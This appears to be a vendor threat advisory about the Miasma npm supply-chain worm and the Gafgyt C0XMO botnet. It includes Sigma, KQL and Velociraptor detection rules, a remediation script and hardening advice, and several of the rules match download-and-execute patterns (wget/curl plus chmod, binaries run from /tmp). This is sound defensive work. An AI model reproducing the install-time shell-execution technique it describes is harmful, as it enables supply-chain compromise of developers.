The latest Security Affairs malware newsletter (Round 101) highlights a disturbing trend in active threat landscapes: the weaponization of the software supply chain and the evolution of cross-platform IoT botnets. Defenders are currently facing the Miasma worm, delivered via a trojanized ai-sdk-ollama package, and a new variant of the Gafgyt botnet known as C0XMO, which features enhanced cross-platform propagation capabilities. These are not theoretical risks; they represent active, ongoing campaigns capable of devastating development pipelines and perimeter networks.
This post provides the technical analysis, detection logic, and remediation steps necessary to contain these threats immediately.
Technical Analysis
1. Miasma: The Supply Chain Worm
Attack Vector: Dependency Confusion / Typosquatting
Entry Point: ai-sdk-ollama (Trojanized npm Package)
Mechanism: The threat actor has published a malicious package mimicking a legitimate Ollama AI SDK. Upon installation via npm install, the package executes a malicious binding.gyp file.
How it Works:
binding.gyp is a standard file used by Node.js to compile native add-ons. However, in this attack, the file contains shell commands that download and execute the Miasma worm. Unlike standard malware delivery, this abuse of the build lifecycle allows the payload to execute automatically during the installation process, often bypassing standard static analysis that looks for compiled JS code rather than build scripts.
Impact: Self-replication capabilities, credential theft, and potential lateral movement from developer workstations into the broader build environment.
2. Gafgyt Variant C0XMO: Cross-Platform Propagation
Target: IoT devices, Linux servers, and Network Infrastructure. Mechanism: Gafgyt (also known as Bashlite) has historically targeted IoT devices via Telnet brute-forcing. The new C0XMO variant introduces cross-platform capabilities, likely utilizing compiled binaries for multiple architectures (ARM, MIPS, x86) to propagate beyond typical IoT devices into generic Linux environments.
Propagation: The variant scans for vulnerable services and exploits weak default credentials or specific unpatched vulnerabilities to spread. Once established, it enslaves the device in a DDoS botnet.
Detection & Response
To defend against these specific threats, Security Arsenal analysts recommend deploying the following detection rules and hunts.
SIGMA Rules
---
title: Potential Malicious npm Build Process - Miasma Worm
id: 8a4b2c9d-1e3f-4a5b-8c6d-7e8f9a0b1c2d
status: experimental
description: Detects suspicious child processes spawned by npm or node-gyp during package installation, indicative of malicious binding.gyp scripts like Miasma.
references:
- https://securityaffairs.com/193609/breaking-news/security-affairs-malware-newsletter-round-101.html
author: Security Arsenal
date: 2026/04/06
tags:
- attack.execution
- attack.t1059.004
- attack.initial_access
- attack.t1199.001
logsource:
category: process_creation
product: windows
detection:
selection_parent:
ParentImage|contains:
- '\node.exe'
- '\npm.cmd'
- '\node-gyp'
selection_child:
Image|endswith:
- '\powershell.exe'
- '\cmd.exe'
- '\bash.exe'
condition: all of selection_*
falsepositives:
- Legitimate build scripts requiring shell access (rare)
level: high
---
title: Gafgyt C0XMO Botnet Download Pattern
id: 9b5c3d0e-2f4a-5b6c-9d7e-0f1a2b3c4d5e
status: experimental
description: Detects common Gafgyt C0XMO download and execution patterns involving wget/curl followed by chmod.
references:
- https://securityaffairs.com/193609/breaking-news/security-affairs-malware-newsletter-round-101.html
author: Security Arsenal
date: 2026/04/06
tags:
- attack.command_and_control
- attack.t1105
logsource:
category: process_creation
product: linux
detection:
selection_download:
CommandLine|contains:
- 'wget'
- 'curl'
selection_perms:
CommandLine|contains:
- 'chmod 777'
- 'chmod +x'
selection_exec:
CommandLine|matches: '\./[a-zA-Z0-9]{6,}'
condition: all of selection_*
falsepositives:
- Administrator manual software installation
level: medium
KQL (Microsoft Sentinel)
// Hunt for Miasma indicators: npm spawning shells
DeviceProcessEvents
| where InitiatingProcessFileName in ('npm.exe', 'node.exe', 'node-gyp.cmd', 'node-gyp')
| where FileName in ('powershell.exe', 'cmd.exe', 'bash.exe', 'sh')
| project Timestamp, DeviceName, AccountName, InitiatingProcessCommandLine, CommandLine, FileName
| order by Timestamp desc
Velociraptor VQL
-- Hunt for suspicious binding.gyp files in node_modules that may contain Miasma payloads
SELECT FullPath, Size, Mtime, Mode
FROM glob(globs='/*/node_modules/*/binding.gyp')
-- Check if the file size is unusually small or large for a gyp file, or recently modified
WHERE Mtime > now() - 7d
-- Hunt for Gafgyt C0XMO processes (often associated with specific binary names or high CPU)
SELECT Pid, Name, Exe, Ctime, Username, CommandLine
FROM pslist()
WHERE Name =~ 'busybox'
OR Exe =~ '/tmp/'
OR Exe =~ '/dev/shm/'
AND CommandLine =~ '(wget|curl|tftp)'
Remediation Script (Bash)
#!/bin/bash
# Remediation script for Miasma (ai-sdk-ollama) and basic Gafgyt hardening
echo "[*] Scanning for malicious ai-sdk-ollama package..."
# Find all package. files and check for the dependency
find /home /root /usr/local/lib -name "package." -exec grep -l "ai-sdk-ollama" {} \; 2>/dev/null | while read file; do
DIR=$(dirname "$file")
echo "[!] Found ai-sdk-ollama in $DIR"
# Remove the malicious package
cd "$DIR" && npm uninstall ai-sdk-ollama --force
echo "[*] Removed package from $DIR"
done
echo "[*] Checking for suspicious binding.gyp content..."
# Look for base64 encoded strings or direct shell execution attempts in gyp files
find /node_modules /home/*/node_modules -name "binding.gyp" -exec grep -l "sh.exec" {} \; 2>/dev/null
echo "[*] Hardening against Gafgyt C0XMO propagation..."
# Block common inbound ports used by Gafgyt (Telnet) if not needed
# (Requires root/sudo)
if [ "$EUID" -eq 0 ]; then
echo "[*] Ensuring Telnet is disabled..."
systemctl disable telnet.socket 2>/dev/null
systemctl stop telnet.socket 2>/dev/null
else
echo "[!] Root privileges required to disable Telnet services."
fi
echo "[+] Remediation check complete."
Remediation
For Miasma (npm Supply Chain)
- Immediate Removal: Run
npm uninstall ai-sdk-ollamain all affected environments. This package is currently identified as the primary vector for the Miasma worm. - Audit Node Modules: Developers should recursively check
node_modulesfolders for the presence ofbinding.gypfiles that contain shell execution commands (sh.exec,powershell.exe). - Dependency Review: Implement strict
package-lock.integrity checking. Ensure CI/CD pipelines are configured to fail builds if new dependencies are introduced without explicit security review. - Network Egress: Restrict outbound internet access from build agents. Build systems should not need to download arbitrary binaries or initiate shell connections to the internet.
For Gafgyt C0XMO (IoT/Linux)
- Credential Hygiene: Change default credentials on all IoT devices and Linux servers exposed to the network. Gafgyt variants propagate primarily via brute-force on Telnet/SSH.
- Disable Unused Services: Ensure Telnet (port 23) is disabled and blocked at the firewall level. Use SSH only with key-based authentication.
- Segmentation: Isolate IoT devices on a separate VLAN. IoT devices should not have unrestricted access to the internal network or the internet.
Related Resources
Security Arsenal Incident Response Services AlertMonitor Platform Book a SOC Assessment incident-response Intel Hub
Is your security operations ready?
Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.